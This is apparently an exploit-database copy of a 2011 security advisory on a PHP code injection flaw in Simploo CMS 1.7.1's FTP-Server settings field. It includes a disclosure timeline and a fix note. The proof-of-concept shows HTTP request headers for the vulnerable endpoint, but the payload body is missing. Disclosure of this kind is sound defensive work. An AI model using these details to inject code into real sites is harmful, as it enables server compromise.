Simploo CMS 1.7.1 PHP Code Execution

ID 1337DAY-ID-15319
Type zdt
Reporter David Vieira-Kurz
Modified 2011-01-20T00:00:00


Exploit for php platform in category web applications

                                            Simploo CMS Community Edition - Remote PHP Code Execution Issue
Product: Simploo CMS Community Edition
Security-Risk: moderated
Remote-Exploit: yes
Advisory-Status: published
Discovered by: David Vieira-Kurz of MajorSecurity
Affected Products:
Simploo CMS 1.7.1 and prior
"Simploo CMS is a content management system (CMS)."
More Details
I have discovered some vulnerabilities in Simploo CMS, which can be
exploited by malicious people to compromise a vulnerable system.
Input passed via the "FTP-Server" field when editing FTP options is not
properly sanitised in lib/Simploo/Config/Writer/Ini.php before being
saved to the config/custom/base.ini.php file. This can be exploited to
inject and execute arbitrary PHP code via a specially crafted parameter
value. Successful exploitation requires "write" privileges.
Proof of Concept
POST /simploo/index.php/sicore/updates/optionssave HTTP/1.1
Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de;
rv: Gecko/20100625 Firefox/3.6.6
Accept: application/json, text/javascript, */*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate Accept-Charset:
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest Referer:
Cookie: PHPSESSID=r87k31lhqmbp9707io8r6qr2p6;
Pragma: no-cache Cache-Control: no-cache Content-Length: 105
Edit the source code to ensure that input is properly sanitised.
2010-07-16, vulnerability identified
2010-07-17, vendor contacted and asked for pgp key
2010-07-19, vendor sent his pgp key
2010-07-20, vulnerability sent to vendor
2011-01-18, advisory published after 6 month
Use of terms
Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact us
for permission. Use of the advisory constitutes acceptance for use in an
"as is" condition. All warranties are excluded. In no event shall
MajorSecurity be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if MajorSecurity has been advised of the possibility of
such damages.

# [2018-02-19]  #